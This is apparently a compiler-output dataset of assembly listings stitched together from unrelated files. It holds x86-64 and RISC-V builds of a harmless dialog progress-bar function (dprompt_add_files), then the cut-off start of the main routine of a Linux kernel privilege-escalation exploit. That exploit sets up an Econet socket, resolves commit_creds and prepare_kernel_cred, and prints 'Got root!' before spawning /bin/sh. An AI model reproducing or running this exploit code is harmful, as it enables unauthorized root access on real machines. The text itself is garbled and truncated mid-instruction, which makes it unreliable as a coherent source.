16(%rbx), %r9 movq 24(%rbx), %rcx movl $134, %eax testq %r9, %r9 je .L136 .L36: movq use_color(%rip), %rdx leaq .LC3(%rip), %r12 leaq .LC4(%rip), %rsi testq %rdx, %rdx cmove %rsi, %r12 cmpq %rcx, DPV_STATUS_FAILED(%rip) je .L137 movl done_lsize(%rip), %esi movl done_rsize(%rip), %r8d leaq .LC6(%rip), %r13 movq done(%rip), %rcx .L43: addl $-128, %eax cmpl $6, %eax ja .L44 leaq .L46(%rip), %rdi movslq (%rdi,%rax,4), %rax addq %rdi, %rax notrack jmp *%rax .section .rodata .align 4 .align 4 .L46: .long .L51-.L46 .long .L50-.L46 .long .L44-.L46 .long .L49-.L46 .long .L48-.L46 .long .L47-.L46 .long .L45-.L46 .text .L126: orq $0, -8(%rsp,%rdx) jmp .L6 .L128: orq $0, -8(%rsp,%rcx) jmp .L9 .p2align 4,,10 .p2align 3 .L45: movl PROMPT_MAX(%rip), %eax movq msg(%rip), %rdi leaq .LC10(%rip), %rdx movq %r9, %rcx leal 1(%rax), %esi xorl %eax, %eax call snprintf@PLT movq msg(%rip), %rdi call strlen@PLT movslq pbar_size(%rip), %rdx movl %eax, mesg_size(%rip) cmpl %edx, %eax jle .L56 movq msg(%rip), %rax movl $0, mesg_rsize(%rip) movl $0, mesg_lsize(%rip) movb $0, (%rax,%rdx) movl pbar_size(%rip), %eax movl mesg_rsize(%rip), %r8d movl mesg_lsize(%rip), %esi movl %eax, mesg_size(%rip) .L57: cmpq $0, use_color(%rip) movq msg(%rip), %rcx je .L59 .L123: leaq .LC2(%rip), %rdi movsbl -135(%rbp), %eax movq %rcx, %r9 pushq %rdi pushq %r8 .L122: movq %rdi, %r8 movl %esi, %ecx movq %r13, %rdx movl %eax, %esi movq %r12, %rdi xorl %eax, %eax call dprompt_add@PLT popq %rax popq %rdx .L52: movl -104(%rbp), %eax cmpl %eax, display_limit(%rip) jle .L22 movq -120(%rbp), %rax cmpq %rbx, -112(%rbp) movq 40(%rbx), %rbx cmove TRUE(%rip), %rax movq %rax, -120(%rbp) testq %rbx, %rbx jne .L62 .L22: movl -132(%rbp), %eax cmpl fheight(%rip), %eax leaq .LC17(%rip), %rbx movl -132(%rbp), %r12d jge .L1 .p2align 4,,10 .p2align 3 .L63: xorl %eax, %eax movq %rbx, %rdi addl $1, %r12d call dprompt_add@PLT cmpl %r12d, fheight(%rip) jg .L63 .L1: movq -56(%rbp), %rax subq %fs:40, %rax jne .L138 movl -104(%rbp), %eax leaq -40(%rbp), %rsp popq %rbx popq %r12 popq %r13 popq %r14 popq %r15 popq %rbp .cfi_remember_state .cfi_def_cfa 7, 8 ret .p2align 4,,10 .p2align 3 .L47: .cfi_restore_state movl pbar_size(%rip), %eax movl 32(%rbx), %edx leaq -96(%rbp), %r15 leaq .LC2(%rip), %rcx movl HN_AUTOSCALE(%rip), %r8d movl HN_NOSPACE(%rip), %r9d movq %r15, %rdi leal 2(%rax), %esi orl HN_DIVISOR_1000(%rip), %r9d call humanize_number@PLT movq %r15, %rdi call strlen@PLT movl pbar_size(%rip), %edx xorl %r8d, %r8d movl %edx, %ecx subl %eax, %ecx movl %ecx, %esi shrl $31, %esi addl %ecx, %esi sarl %esi leal (%rax,%rsi,2), %eax cmpl %eax, %edx setne %r8b addl %esi, %r8d cmpq $0, use_color(%rip) je .L55 leaq .LC2(%rip), %rdi movsbl -135(%rbp), %eax movq %r15, %r9 pushq %rdi pushq %r8 jmp .L122 .p2align 4,,10 .p2align 3 .L50: movq -144(%rbp), %rsi leaq .LC15(%rip), %rdi xorl %eax, %eax call dprompt_add@PLT jmp .L52 .p2align 4,,10 .p2align 3 .L48: testq %rdx, %rdx jne .L123 .L59: leaq .LC2(%rip), %r9 movq %r12, %rdi xorl %eax, %eax movq %r9, %rdx call dprompt_add@PLT jmp .L52 .p2align 4,,10 .p2align 3 .L49: movl pbar_size(%rip), %esi testq %rdx, %rdx je .L60 leaq .LC2(%rip), %rdi movsbl -135(%rbp), %eax pushq %rdi movq %rdi, %r9 pushq $0 jmp .L122 .p2align 4,,10 .p2align 3 .L51: leaq .LC2(%rip), %r9 movl pend_rsize(%rip), %r8d xorl %eax, %eax movl pend(%rip), %ecx movl pend_lsize(%rip), %esi movq %r9, %rdx leaq .LC4(%rip), %rdi call dprompt_add@PLT jmp .L52 .p2align 4,,10 .p2align 3 .L44: leaq .LC16(%rip), %rdi xorl %eax, %eax call dprompt_add@PLT jmp .L52 .p2align 4,,10 .p2align 3 .L133: movl FLABEL_MAX(%rip), %eax subl $1, %eax cmpl %r12d, %eax jle .L29 movq FALSE(%rip), %rax cmpq %rax, no_labels(%rip) jne .L29 addl $2, %r12d jmp .L29 .p2align 4,,10 .p2align 3 .L137: movl fail_lsize(%rip), %esi movl fail_rsize(%rip), %r8d leaq .LC5(%rip), %r13 movq fail(%rip), %rcx jmp .L43 .p2align 4,,10 .p2align 3 .L134: movslq %r12d, %rax leaq .LC11(%rip), %rsi leaq -3(%r14,%rax), %rdi call sprintf@PLT jmp .L30 .p2align 4,,10 .p2align 3 .L135: movq %r14, %rdi call strlen@PLT movslq %r12d, %rdx movslq %eax, %rdi addq %r14, %rdx addq %r14, %rdi cmpq %rdx, %rdi jb .L139 .L32: xorl %eax, %eax call spin_char@PLT cmpq $0, use_color(%rip) movq %r14, %rcx movl %r12d, %edx movl %eax, %r9d leaq .LC0(%rip), %r8 leaq .LC2(%rip), %rax leaq .LC1(%rip), %rsi cmove %rax, %r8 leaq .LC12(%rip), %rdi cmove %rax, %rsi xorl %eax, %eax call dprompt_add@PLT jmp .L34 .p2align 4,,10 .p2align 3 .L131: movl pprompt(%rip), %edi call dialog_prompt_nlstate@PLT movq %rax, -128(%rbp) jmp .L23 .p2align 4,,10 .p2align 3 .L136: movl pbar_size(%rip), %edx movl $130, %eax testl %edx, %edx js .L36 movl $131, %eax cmpl $3, %edx jle .L36 cmpq $0, -120(%rbp) movl $128, %eax jne .L36 cmpq %rbx, -112(%rbp) je .L140 cmpq $0, dialog_test(%rip) movl $132, %eax jne .L36 movq (%rbx), %rax shrq $63, %rax addl $132, %eax jmp .L36 .p2align 4,,10 .p2align 3 .L132: movzbl 0(%r13), %edx testb %dl, %dl je .L26 movq %r13, %rax jmp .L28 .p2align 4,,10 .p2align 3 .L69: movl %ecx, %edx .L27: movq %rsi, %rax testb %dl, %dl je .L26 .L28: movzbl 1(%rax), %ecx leaq 1(%rax), %rsi cmpb $92, %dl jne .L69 testb %cl, %cl jne .L141 .L26: movl FLABEL_MAX(%rip), %eax cmpl %eax, %r12d cmovg %eax, %r12d jmp .L25 .p2align 4,,10 .p2align 3 .L141: movzbl 2(%rax), %edx leaq 2(%rax), %rsi cmpb $90, %cl jne .L27 testb %dl, %dl je .L26 movzbl 3(%rax), %edx addl $3, %r12d leaq 3(%rax), %rsi jmp .L27 .p2align 4,,10 .p2align 3 .L139: movl %r15d, %esi leaq .LC11(%rip), %rdx subl %eax, %esi xorl %eax, %eax call snprintf@PLT jmp .L32 .p2align 4,,10 .p2align 3 .L67: movb $98, -135(%rbp) movl $52, %r13d jmp .L16 .p2align 4,,10 .p2align 3 .L55: leaq .LC2(%rip), %r9 movq %r15, %rcx movq %r12, %rdi xorl %eax, %eax movq %r9, %rdx call dprompt_add@PLT jmp .L52 .p2align 4,,10 .p2align 3 .L60: leaq .LC2(%rip), %r9 xorl %r8d, %r8d movq %r12, %rdi xorl %eax, %eax movq %r9, %rcx movq %r9, %rdx call dprompt_add@PLT jmp .L52 .p2align 4,,10 .p2align 3 .L56: movl %edx, %esi subl %eax, %esi sarl %esi leal (%rax,%rsi,2), %eax movl %esi, mesg_lsize(%rip) cmpl %eax, %edx je .L142 leal 1(%rsi), %r8d movl %r8d, mesg_rsize(%rip) jmp .L57 .p2align 4,,10 .p2align 3 .L142: movl %esi, mesg_rsize(%rip) movl %esi, %r8d jmp .L57 .L140: movq -144(%rbp), %rax cmpb $0, (%rax) jne .L38 movq -112(%rbp), %rdi movl $133, %eax cmpq $0, (%rdi) js .L36 xorl %eax, %eax cmpq %rcx, DPV_STATUS_RUNNING(%rip) sete %al addl $132, %eax jmp .L36 .L38: cmpq $0, dialog_test(%rip) je .L39 cmpb $1, %r13b sbbl %eax, %eax andl $3, %eax addl $129, %eax jmp .L36 .L68: movl $0, -104(%rbp) movl $0, -132(%rbp) jmp .L22 .L39: movq -112(%rbp), %rax movq (%rax), %rdx movq %rdx, %rax shrq $63, %rax addl $132, %eax cmpq %rcx, DPV_STATUS_RUNNING(%rip) jne .L36 movq %rdx, %rax sarq $63, %rax andl $4, %eax addl $129, %eax jmp .L36 .L138: call __stack_chk_fail@PLT .cfi_endproc .LFE0: .size dprompt_add_files, .-dprompt_add_files .globl use_shadow .bss .align 8 .type use_shadow, @object .size use_shadow, 8 use_shadow: .zero 8 .globl use_libdialog .align 8 .type use_libdialog, @object .size use_libdialog, 8 use_libdialog: .zero 8 .globl use_dialog .align 8 .type use_dialog, @object .size use_dialog, 8 use_dialog: .zero 8 .globl use_colors .align 8 .type use_colors, @object .size use_colors, 8 use_colors: .zero 8 .globl use_color .align 8 .type use_color, @object .size use_color, 8 use_color: .zero 8 .globl pprompt .align 4 .type pprompt, @object .size pprompt, 4 pprompt: .zero 4 .globl pend_rsize .align 4 .type pend_rsize, @object .size pend_rsize, 4 pend_rsize: .zero 4 .globl pend_lsize .align 4 .type pend_lsize, @object .size pend_lsize, 4 pend_lsize: .zero 4 .globl pend .align 4 .type pend, @object .size pend, 4 pend: .zero 4 .globl pct_rsize .align 4 .type pct_rsize, @object .size pct_rsize, 4 pct_rsize: .zero 4 .globl pct_lsize .align 8 .type pct_lsize, @object .size pct_lsize, 8 pct_lsize: .zero 8 .globl pbar_size .align 4 .type pbar_size, @object .size pbar_size, 4 pbar_size: .zero 4 .globl no_labels .align 8 .type no_labels, @object .size no_labels, 8 no_labels: .zero 8 .globl msg .align 8 .type msg, @object .size msg, 8 msg: .zero 8 .globl mesg_size .align 4 .type mesg_size, @object .size mesg_size, 4 mesg_size: .zero 4 .globl mesg_rsize .align 4 .type mesg_rsize, @object .size mesg_rsize, 4 mesg_rsize: .zero 4 .globl mesg_lsize .align 4 .type mesg_lsize, @object .size mesg_lsize, 4 mesg_lsize: .zero 4 .globl label_size .align 4 .type label_size, @object .size label_size, 4 label_size: .zero 4 .globl gauge_color .align 8 .type gauge_color, @object .size gauge_color, 8 gauge_color: .zero 8 .globl fheight .align 4 .type fheight, @object .size fheight, 4 fheight: .zero 4 .globl fail_rsize .align 4 .type fail_rsize, @object .size fail_rsize, 4 fail_rsize: .zero 4 .globl fail_lsize .align 4 .type fail_lsize, @object .size fail_lsize, 4 fail_lsize: .zero 4 .globl fail .align 8 .type fail, @object .size fail, 8 fail: .zero 8 .globl dwidth .align 4 .type dwidth, @object .size dwidth, 4 dwidth: .zero 4 .globl done_rsize .align 4 .type done_rsize, @object .size done_rsize, 4 done_rsize: .zero 4 .globl done_lsize .align 4 .type done_lsize, @object .size done_lsize, 4 done_lsize: .zero 4 .globl done .align 8 .type done, @object .size done, 8 done: .zero 8 .globl display_limit .align 4 .type display_limit, @object .size display_limit, 4 display_limit: .zero 4 .globl dialog_test .align 8 .type dialog_test, @object .size dialog_test, 8 dialog_test: .zero 8 .globl TRUE .align 8 .type TRUE, @object .size TRUE, 8 TRUE: .zero 8 .globl PROMPT_MAX .align 4 .type PROMPT_MAX, @object .size PROMPT_MAX, 4 PROMPT_MAX: .zero 4 .globl HN_NOSPACE .align 4 .type HN_NOSPACE, @object .size HN_NOSPACE, 4 HN_NOSPACE: .zero 4 .globl HN_DIVISOR_1000 .align 4 .type HN_DIVISOR_1000, @object .size HN_DIVISOR_1000, 4 HN_DIVISOR_1000: .zero 4 .globl HN_AUTOSCALE .align 4 .type HN_AUTOSCALE, @object .size HN_AUTOSCALE, 4 HN_AUTOSCALE: .zero 4 .globl FLABEL_MAX .align 4 .type FLABEL_MAX, @object .size FLABEL_MAX, 4 FLABEL_MAX: .zero 4 .globl FALSE .align 8 .type FALSE, @object .size FALSE, 8 FALSE: .zero 8 .globl DPV_STATUS_RUNNING .align 8 .type DPV_STATUS_RUNNING, @object .size DPV_STATUS_RUNNING, 8 DPV_STATUS_RUNNING: .zero 8 .globl DPV_STATUS_FAILED .align 8 .type DPV_STATUS_FAILED, @object .size DPV_STATUS_FAILED, 8 DPV_STATUS_FAILED: .zero 8 .globl g_aug_volatile_4579 .data .align 4 .type g_aug_volatile_4579, @object .size g_aug_volatile_4579, 4 g_aug_volatile_4579: .long 10 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_dprompt.c_dprompt_add_files_aug_v3_4.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "" .align 3 .LC1: .string "\\Zb" .align 3 .LC2: .string "\\Zn" .align 3 .LC3: .string " [\\Z%c%s%-*s%s%-*s\\Zn]\\n" .align 3 .LC4: .string " [%-*s%s%-*s]\\n" .align 3 .LC5: .string "\\Zr\\Z1" .align 3 .LC6: .string "\\Zr\\Z2" .align 3 .LC7: .string "%*s%3u%%%*s" .align 3 .LC8: .string "\\ZR" .align 3 .LC9: .string "\\Z%c\\Zr\\Z%c%s%s%s\\Zn" .align 3 .LC10: .string "%s" .align 3 .LC11: .string "..." .align 3 .LC12: .string "%s%-*s%s %c" .align 3 .LC13: .string " " .align 3 .LC14: .string "%-*s%s %s" .align 3 .LC15: .string " [%s]\\n" .align 3 .LC16: .string " \\n" .align 3 .LC17: .string "\n" .text .align 1 .type dprompt_add_files, @function dprompt_add_files: addi sp,sp,-208 sd s0,192(sp) sd s1,184(sp) addi s0,sp,208 sd s6,144(sp) sd s11,104(sp) sd ra,200(sp) sd s2,176(sp) sd s3,168(sp) sd s4,160(sp) sd s5,152(sp) sd s7,136(sp) sd s8,128(sp) sd s9,120(sp) sd s10,112(sp) la a4,__stack_chk_guard ld a5, 0(a4) sd a5, -120(s0) li a5, 0 sd a2,-184(s0) mv s6,a1 mv s1,a0 lla s11,.LANCHOR0 beq a1,zero,.L2 ld a5,0(s11) sd a5,-192(s0) .L3: lw a5,16(s11) lw a1,20(s11) ld a3,24(s11) addiw a5,a5,1 addi a5,a5,15 addiw s2,a1,16 andi a5,a5,-16 addi a4,s2,15 andi a4,a4,-16 sub sp,sp,a5 mv s5,sp sub sp,sp,a4 sd sp,-200(s0) sub sp,sp,a4 mv s4,sp sub sp,sp,a4 mv s3,sp beq a3,zero,.L56 ld a5,32(s11) bne a5,zero,.L111 .L56: li a5,98 li s7,52 sd a5,-208(s0) .L4: ld a5,-200(s0) sb zero,0(a5) ld a5,-184(s0) or a5,a1,a5 blt a5,zero,.L6 beq s6,zero,.L6 ld a5,0(s6) bge a5,zero,.L8 ld a5,48(s11) beq a5,zero,.L6 .L8: ld s8,-184(s0) lw a6,56(s11) ld a3,64(s11) ld a0,-200(s0) lla a7,.LC0 mv a5,s8 mv a4,a7 lla a2,.LC7 addiw a1,a1,1 call snprintf@plt ld a5,72(s11) beq a5,zero,.L6 lw a5,20(s11) li a4,100 li a3,50 mulw a5,a5,s8 remw a2,a5,a4 divw s8,a5,a4 ble a2,a3,.L9 addiw s8,s8,-1 .L9: ld s9,-200(s0) lw a2,80(s11) mv a0,s3 mv a1,s9 sb zero,0(s3) sb zero,0(s4) call strncat@plt lw a2,80(s11) add a1,s9,s8 add s8,s3,s8 mv a0,s4 sb zero,0(s8) call strncat@plt ld a3,-208(s0) mv a7,s4 lla a6,.LC8 mv a5,s3 mv a4,s7 lla a2,.LC9 mv a1,s2 mv a0,s9 call snprintf@plt .L6: li s4,0 li s3,0 beq s1,zero,.L10 li s7,0 lla s9,.LC10 lla s10,.LC0 .L51: ld a5,88(s11) lw s2,84(s11) ld s8,8(s1) addiw s4,s4,1 bne a5,zero,.L112 .L11: mv a1,s7 mv a0,s8 call dialog_prompt_numlines@plt mv a5,a0 li a1,1 mv a0,s8 addw s3,a5,s3 call dialog_prompt_lastline@plt mv a3,a0 beq s8,a0,.L12 lbu a5,0(a0) sd a0,-168(s0) sb zero,0(a0) mv a1,s8 mv a0,s9 sd a5,-176(s0) call dprompt_add@plt ld a3,-168(s0) ld a5,-176(s0) sb a5,0(a3) .L12: ld a5,88(s11) ld a4,104(s11) or a5,a5,a4 beq a5,zero,.L13 ld a5,72(s11) bne a5,zero,.L113 .L13: lw a5,20(s11) blt a5,zero,.L114 .L18: addiw a1,s2,1 mv a2,s9 mv a0,s5 mv s8,a1 call snprintf@plt bgt a0,s2,.L115 beq s6,s1,.L116 .L20: ld a5,72(s11) lla a3,.LC2 bne a5,zero,.L24 mv a3,s10 .L24: mv a1,s2 lla a4,.LC13 mv a2,s5 lla a0,.LC14 call dprompt_add@plt ld a3,16(s1) ld a1,24(s1) li a5,134 beq a3,zero,.L117 .L25: ld a7,72(s11) lla s2,.LC3 bne a7,zero,.L30 lla s2,.LC4 .L30: ld a4,128(s11) beq a4,a1,.L118 lw a1,152(s11) lw a4,156(s11) ld a0,160(s11) lla s8,.LC6 .L32: addiw a5,a5,-128 sext.w a6,a5 li a2,6 bgtu a6,a2,.L33 slli a6,a5,32 lla a2,.L35 srli a5,a6,30 add a5,a5,a2 lw a5,0(a5) add a5,a5,a2 jr a5 .section .rodata .align 2 .align 2 .L35: .word .L40-.L35 .word .L39-.L35 .word .L33-.L35 .word .L38-.L35 .word .L37-.L35 .word .L36-.L35 .word .L34-.L35 .text .L115: addi a0,s2,-3 lla a1,.LC11 add a0,s5,a0 call sprintf@plt bne s6,s1,.L20 .L116: ld a4,-184(s0) li a5,99 bgt a4,a5,.L20 mv a0,s5 call strlen@plt mv a1,a0 add a5,s5,s2 add a0,s5,a0 bltu a0,a5,.L119 .L21: ld a5,72(s11) bne a5,zero,.L120 mv s8,s10 mv a4,s10 .L22: sd a4,-168(s0) call spin_char@plt ld a4,-168(s0) mv a5,a0 mv a3,s5 mv a1,s8 mv a2,s2 lla a0,.LC12 call dprompt_add@plt ld a3,16(s1) ld a1,24(s1) li a5,134 bne a3,zero,.L25 .L117: lw a4,20(s11) li a5,130 blt a4,zero,.L25 li a2,3 li a5,131 ble a4,a2,.L25 ld a4,-192(s0) li a5,128 bne a4,zero,.L25 beq s6,s1,.L121 ld a4,48(s11) li a5,132 bne a4,zero,.L25 ld a5,0(s1) slti a5,a5,0 addi a5,a5,132 j .L25 .L34: lw a1,192(s11) ld a0,200(s11) mv a2,s9 addiw a1,a1,1 call snprintf@plt ld a0,200(s11) call strlen@plt lw a4,20(s11) sw a0,208(s11) ble a0,a4,.L45 ld a5,200(s11) sw zero,.LANCHOR0+212,a3 sw zero,.LANCHOR0+216,a3 add a5,a5,a4 sb zero,0(a5) lw a5,20(s11) lw a1,216(s11) lw a4,212(s11) sw a5,208(s11) .L46: ld a5,72(s11) ld a3,200(s11) beq a5,zero,.L48 mv a6,a4 mv a7,s10 mv a5,a3 lla a4,.LC0 j .L109 .L36: lw a3,180(s11) lw a5,184(s11) lw a1,20(s11) lw a4,188(s11) lw a2,32(s1) addi t3,s0,-152 or a5,a3,a5 addiw a1,a1,2 mv a3,s10 mv a0,t3 sd t3,-168(s0) call humanize_number@plt ld t3,-168(s0) mv a0,t3 call strlen@plt lw a3,20(s11) ld t3,-168(s0) subw a4,a3,a0 srliw a5,a4,31 addw a5,a5,a4 sraiw a1,a5,1 addw a0,a0,a1 addw a0,a0,a1 mv a4,a1 beq a0,a3,.L43 addiw a4,a1,1 .L43: ld a5,72(s11) beq a5,zero,.L44 mv a6,a4 mv a7,s10 mv a5,t3 lla a4,.LC0 j .L109 .L37: beq a7,zero,.L42 mv a6,a4 mv a7,s10 mv a5,a0 lla a4,.LC0 j .L109 .L38: lw a1,20(s11) beq a7,zero,.L49 lla a5,.LC0 mv a7,s10 li a6,0 mv a4,a5 .L109: mv a3,a1 ld a1,-208(s0) mv a2,s8 mv a0,s2 call dprompt_add@plt .L41: lw a5,220(s11) ble a5,s4,.L10 beq s6,s1,.L122 .L50: ld s1,40(s1) bne s1,zero,.L51 .L10: lw a5,224(s11) lla s1,.LC17 ble a5,s3,.L53 .L52: mv a0,s1 call dprompt_add@plt lw a5,224(s11) addiw s3,s3,1 bgt a5,s3,.L52 .L53: la a5,__stack_chk_guard ld a4, -120(s0) ld a5, 0(a5) xor a5, a4, a5 li a4, 0 bne a5,zero,.L123 addi sp,s0,-208 ld ra,200(sp) mv a0,s4 ld s0,192(sp) ld s1,184(sp) ld s2,176(sp) ld s3,168(sp) ld s4,160(sp) ld s5,152(sp) ld s6,144(sp) ld s7,136(sp) ld s8,128(sp) ld s9,120(sp) ld s10,112(sp) ld s11,104(sp) addi sp,sp,208 jr ra .L39: ld a1,-200(s0) lla a0,.LC15 call dprompt_add@plt j .L41 .L40: lw a4,168(s11) lw a3,172(s11) lw a1,176(s11) mv a5,s10 lla a2,.LC0 lla a0,.LC4 call dprompt_add@plt j .L41 .L33: lla a0,.LC16 call dprompt_add@plt j .L41 .L114: lw a5,16(s11) addiw a5,a5,-1 ble a5,s2,.L18 ld a4,112(s11) ld a5,0(s11) bne a4,a5,.L18 addiw s2,s2,2 j .L18 .L118: lw a1,136(s11) lw a4,140(s11) ld a0,144(s11) lla s8,.LC5 j .L32 .L112: lw a0,96(s11) call dialog_prompt_nlstate@plt mv s7,a0 j .L11 .L122: ld a5,8(s11) sd a5,-192(s0) j .L50 .L113: lbu a4,0(a3) beq a4,zero,.L14 mv a5,a3 li a0,92 j .L16 .L58: mv a4,a2 .L15: mv a5,a1 beq a4,zero,.L14 .L16: lbu a2,1(a5) addi a1,a5,1 bne a4,a0,.L58 bne a2,zero,.L124 .L14: lw a5,16(s11) mv a4,a5 ble a5,s2,.L17 mv a4,s2 .L17: sext.w s2,a4 j .L13 .L124: li a6,90 lbu a4,2(a5) addi a1,a5,2 bne a2,a6,.L15 beq a4,zero,.L14 lbu a4,3(a5) addiw s2,s2,3 addi a1,a5,3 j .L15 .L49: lla a3,.LC0 mv a5,s10 li a4,0 mv a2,a3 mv a0,s2 call dprompt_add@plt j .L41 .L44: mv a5,s10 mv a3,t3 lla a2,.LC0 mv a0,s2 call dprompt_add@plt j .L41 .L42: mv a3,a0 mv a5,s10 lla a2,.LC0 mv a0,s2 call dprompt_add@plt j .L41 .L48: mv a5,s10 lla a2,.LC0 mv a0,s2 call dprompt_add@plt j .L41 .L45: subw a5,a4,a0 sraiw a1,a5,1 addw a0,a0,a1 sw a1,216(s11) addw a0,a0,a1 beq a0,a4,.L125 addiw a4,a1,1 sw a4,212(s11) j .L46 .L120: lla s8,.LC1 lla a4,.LC2 j .L22 .L111: ld a5,40(s11) lbu s7,0(a5) lbu a5,2(a5) sd a5,-208(s0) j .L4 .L125: sw a1,212(s11) mv a4,a1 j .L46 .L2: ld a5,8(s11) sd a5,-192(s0) j .L3 .L119: lla a2,.LC11 subw a1,s8,a1 call snprintf@plt j .L21 .L121: ld a5,-200(s0) lbu a5,0(a5) bne a5,zero,.L27 ld a4,0(s6) li a5,133 blt a4,zero,.L25 ld a5,120(s11) sub a5,a5,a1 seqz a5,a5 addi a5,a5,132 j .L25 .L27: ld a5,48(s11) beq a5,zero,.L28 ld a2,-184(s0) li a4,99 li a5,132 bgt a2,a4,.L25 li a5,129 j .L25 .L28: ld a4,0(s6) ld a2,120(s11) slti a5,a4,0 addi a5,a5,132 bne a2,a1,.L25 srai a5,a4,63 andi a5,a5,4 addi a5,a5,129 j .L25 .L123: call __stack_chk_fail@plt .size dprompt_add_files, .-dprompt_add_files .globl use_shadow .globl use_libdialog .globl use_dialog .globl use_colors .globl use_color .globl pprompt .globl pend_rsize .globl pend_lsize .globl pend .globl pct_rsize .globl pct_lsize .globl pbar_size .globl no_labels .globl msg .globl mesg_size .globl mesg_rsize .globl mesg_lsize .globl label_size .globl gauge_color .globl fheight .globl fail_rsize .globl fail_lsize .globl fail .globl dwidth .globl done_rsize .globl done_lsize .globl done .globl display_limit .globl dialog_test .globl TRUE .globl PROMPT_MAX .globl HN_NOSPACE .globl HN_DIVISOR_1000 .globl HN_AUTOSCALE .globl FLABEL_MAX .globl FALSE .globl DPV_STATUS_RUNNING .globl DPV_STATUS_FAILED .globl g_aug_volatile_4579 .data .align 2 .type g_aug_volatile_4579, @object .size g_aug_volatile_4579, 4 g_aug_volatile_4579: .word 10 .bss .align 3 .set .LANCHOR0,. + 0 .type FALSE, @object .size FALSE, 8 FALSE: .zero 8 .type TRUE, @object .size TRUE, 8 TRUE: .zero 8 .type FLABEL_MAX, @object .size FLABEL_MAX, 4 FLABEL_MAX: .zero 4 .type pbar_size, @object .size pbar_size, 4 pbar_size: .zero 4 .type use_colors, @object .size use_colors, 8 use_colors: .zero 8 .type use_shadow, @object .size use_shadow, 8 use_shadow: .zero 8 .type gauge_color, @object .size gauge_color, 8 gauge_color: .zero 8 .type dialog_test, @object .size dialog_test, 8 dialog_test: .zero 8 .type pct_rsize, @object .size pct_rsize, 4 pct_rsize: .zero 4 .zero 4 .type pct_lsize, @object .size pct_lsize, 8 pct_lsize: .zero 8 .type use_color, @object .size use_color, 8 use_color: .zero 8 .type dwidth, @object .size dwidth, 4 dwidth: .zero 4 .type label_size, @object .size label_size, 4 label_size: .zero 4 .type use_dialog, @object .size use_dialog, 8 use_dialog: .zero 8 .type pprompt, @object .size pprompt, 4 pprompt: .zero 4 .zero 4 .type use_libdialog, @object .size use_libdialog, 8 use_libdialog: .zero 8 .type no_labels, @object .size no_labels, 8 no_labels: .zero 8 .type DPV_STATUS_RUNNING, @object .size DPV_STATUS_RUNNING, 8 DPV_STATUS_RUNNING: .zero 8 .type DPV_STATUS_FAILED, @object .size DPV_STATUS_FAILED, 8 DPV_STATUS_FAILED: .zero 8 .type fail_lsize, @object .size fail_lsize, 4 fail_lsize: .zero 4 .type fail_rsize, @object .size fail_rsize, 4 fail_rsize: .zero 4 .type fail, @object .size fail, 8 fail: .zero 8 .type done_lsize, @object .size done_lsize, 4 done_lsize: .zero 4 .type done_rsize, @object .size done_rsize, 4 done_rsize: .zero 4 .type done, @object .size done, 8 done: .zero 8 .type pend_rsize, @object .size pend_rsize, 4 pend_rsize: .zero 4 .type pend, @object .size pend, 4 pend: .zero 4 .type pend_lsize, @object .size pend_lsize, 4 pend_lsize: .zero 4 .type HN_NOSPACE, @object .size HN_NOSPACE, 4 HN_NOSPACE: .zero 4 .type HN_DIVISOR_1000, @object .size HN_DIVISOR_1000, 4 HN_DIVISOR_1000: .zero 4 .type HN_AUTOSCALE, @object .size HN_AUTOSCALE, 4 HN_AUTOSCALE: .zero 4 .type PROMPT_MAX, @object .size PROMPT_MAX, 4 PROMPT_MAX: .zero 4 .zero 4 .type msg, @object .size msg, 8 msg: .zero 8 .type mesg_size, @object .size mesg_size, 4 mesg_size: .zero 4 .type mesg_rsize, @object .size mesg_rsize, 4 mesg_rsize: .zero 4 .type mesg_lsize, @object .size mesg_lsize, 4 mesg_lsize: .zero 4 .type display_limit, @object .size display_limit, 4 display_limit: .zero 4 .type fheight, @object .size fheight, 4 fheight: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_15704.c_main_aug_v3_6
.file "extr_15704.c_main_aug_v3_6.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "/dev/zero" .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC1: .string "[*] Failed to open file descriptors.\n" .align 8 .LC2: .string "[*] Resolving kernel addresses...\n" .section .rodata.str1.1 .LC3: .string "econet_ioctl" .LC4: .string "econet_ops" .LC5: .string "commit_creds" .LC6: .string "prepare_kernel_cred" .section .rodata.str1.8 .align 8 .LC7: .string "[*] Failed to resolve kernel symbols.\n" .align 8 .LC8: .string "[*] Failed to allocate memory.\n" .section .rodata.str1.1 .LC9: .string "[*] Calculating target...\n" .section .rodata.str1.8 .align 8 .LC10: .string "[*] Failed to mmap() at target address.\n" .section .rodata.str1.1 .LC11: .string "[*] Triggering payload...\n" .section .rodata.str1.8 .align 8 .LC12: .string "[*] Exploit failed to get root.\n" .section .rodata.str1.1 .LC13: .string "[*] Got root!\n" .LC14: .string "/bin/sh" .section .text.startup,"ax",@progbits .p2align 4 .globl main .type main, @function main: .LFB0: .cfi_startproc endbr64 pushq %r14 .cfi_def_cfa_offset 16 .cfi_offset 14, -16 pushq %r13 .cfi_def_cfa_offset 24 .cfi_offset 13, -24 pushq %r12 .cfi_def_cfa_offset 32 .cfi_offset 12, -32 pushq %rbp .cfi_def_cfa_offset 40 .cfi_offset 6, -40 pushq %rbx .cfi_def_cfa_offset 48 .cfi_offset 3, -48 subq $32, %rsp .cfi_def_cfa_offset 80 movq %fs:40, %rax movq %rax, 24(%rsp) movl g_aug_volatile_1644(%rip), %eax movq %rsp, %r12 movq %r12, %rdi addl $1, %eax movl %eax, g_aug_volatile_1644(%rip) call pipe@PLT movl SOCK_DGRAM(%rip), %esi movl PF_ECONET(%rip), %edi xorl %edx, %edx call socket@PLT movl O_RDONLY(%rip), %esi leaq .LC0(%rip), %rdi movl %eax, 8(%rsp) call open@PLT movl (%rsp), %edx orl 4(%rsp), %edx orl 8(%rsp), %edx movl %eax, 12(%rsp) orl %eax, %edx js .L17 leaq .LC2(%rip), %rdi call printf@PLT leaq .LC3(%rip), %rdi call get_kernel_sym@PLT leaq .LC4(%rip), %rdi movq %rax, %rbx call get_kernel_sym@PLT leaq 